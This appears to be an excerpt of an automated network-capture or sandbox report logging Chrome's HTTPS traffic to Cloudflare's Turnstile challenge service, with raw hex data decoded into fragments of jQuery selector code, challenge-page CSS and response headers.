                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.649736104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:03 UTC801OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/ HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://7x8x.digitalvoyage.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:03 UTC1362INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 26657
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                  cross-origin-embedder-policy: require-corp
                                                                                  cross-origin-opener-policy: same-origin
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  origin-agent-cluster: ?1
                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  referrer-policy: same-origin
                                                                                  document-policy: js-profiling
                                                                                  2025-01-07 18:49:03 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 36 32 30 32 36 33 38 35 35 35 65 37 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8fe6202638555e78-EWRalt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:03 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.649742104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:03 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:03 UTC471INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:03 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 47521
                                                                                  Connection: close
                                                                                  accept-ranges: bytes
                                                                                  last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                  access-control-allow-origin: *
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202639064289-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:03 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
